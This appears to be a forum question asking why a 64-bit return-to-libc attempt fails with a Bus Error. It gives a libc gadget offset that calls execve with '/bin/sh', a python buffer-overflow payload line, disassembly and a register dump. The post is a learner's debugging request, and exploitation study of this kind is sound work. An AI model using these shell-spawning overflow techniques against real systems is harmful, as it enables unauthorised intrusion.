Good day guys I want to perform return to libc in 64 bit architecture using execve. I found a gadget with /bin/sh in it (the /bin/sh offset is 18a143):
cbcd8: 00 00 cbcda: 4c 89 ea mov rdx,r13 cbcdd: 4c 89 e6 mov rsi,r12 cbce0: 48 8d 3d 5c e4 0b 00 lea rdi,[rip+0xbe45c] # 18a143 <_libc_intl_domainname@@GLIBC_2.2.5+0x17e> cbce7: e8 94 f9 ff ff call cb680 <execve@@GLIBC_2.2.5> -- cbd92: 48 85 c0 test rax,rax now I fill the return address (RIP) with (address of libc + 0xcbce0) with this payload:
r $ (python -c 'print "A"*120 + {libc+-xcbce0}') . Here are the registers:
RAX: 0xffffffffffffffff RBX: 0x0 RCX: 0xffffffffffffff80 RDX: 0x0 RSI: 0x555555555060 (<_start>: xor ebp,ebp) RDI: 0x7ffff7f79143 --> 0x68732f6e69622f ('/bin/sh') RBP: 0x4141414141414141 ('AAAAAAAA') RSP: 0x0 RIP: 0x7ffff7ebacef (<maybe_script_execute+175>: mov rax,QWORD PTR [rbp-0x28]) R8 : 0xffffffff R9 : 0x8a R10: 0x7fffffffdfb0 ('A' <repeats 120 times>, "443777") R11: 0x202 R12: 0x555555555060 (<_start>: xor ebp,ebp) R13: 0x0 R14: 0x0 R15: 0x0 and here are tho codes around execve:
0x7ffff7ebace0 <maybe_script_execute+160>: lea rdi,[rip+0xbe45c] # 0x7ffff7f79143 0x7ffff7ebace7 <maybe_script_execute+167>: call 0x7ffff7eba680 <execve> 0x7ffff7ebacec <maybe_script_execute+172>: mov rsp,rbx 0x7ffff7ebacef <maybe_script_execute+175>: mov rax,QWORD PTR [rbp-0x28] 0x7ffff7ebacf3 <maybe_script_execute+179>: sub rax,QWORD PTR fs:0x28 0x7ffff7ebacfc <maybe_script_execute+188>: jne 0x7ffff7ebad4b <maybe_script_execute+267> 0x7ffff7ebacfe <maybe_script_execute+190>: lea rsp,[rbp-0x18] 0x7ffff7ebad02 <maybe_script_execute+194>: pop rbx but it not works and gives Bus Error.Thanks for help.
